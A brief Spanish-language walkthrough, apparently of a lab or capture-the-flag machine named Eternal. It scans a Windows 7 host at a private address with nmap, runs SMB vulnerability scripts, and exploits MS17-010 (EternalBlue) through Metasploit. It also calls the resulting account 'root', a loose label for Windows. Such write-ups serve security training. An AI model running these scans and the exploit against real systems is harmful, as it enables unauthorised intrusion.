Eternal
🔍 Dificultad: Muy Fácil
🔍 RECONOCIMIENTO
En primer lugar, tras conectarnos a la máquina, utilizamos el comando:
ping -c 1 192.168.1.70
para verificar la conectividad de red.

A continuación, se realiza el comando:
nmap -p- --open 192.168.1.70 --min-rate 5000 -n
para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo, los puertos 135, 139, 445, 5357, y varios puertos en el rango 49152-49157 están abiertos. Estos pertenecen a los servicios de Microsoft RPC, NetBIOS-SSN, Microsoft-DS, WSDAPI, y puertos desconocidos, por lo que a continuación se indagará más.
🔎 EXPLORACIÓN
Se utiliza el comando:
sudo nmap -sCV -p135,139,445,5357 -v 192.168.1.70
para obtener más información sobre ese puerto específicamente.

Estamos ante un Windows 7. Revisamos el puerto 445.
nmap -p445 --script="smb-vuln-*" 192.168.1.70

🚀 EXPLOTACIÓN
Vamos explotar MS17-010 con Metasploit conocida como EternalBlue.
set RHOSTS 192.168.1.70
exploit

🔐 PRIVILEGIOS
Al estar dentro y ejecutar:
getuid
aún somos root.

Last updated
Was this helpful?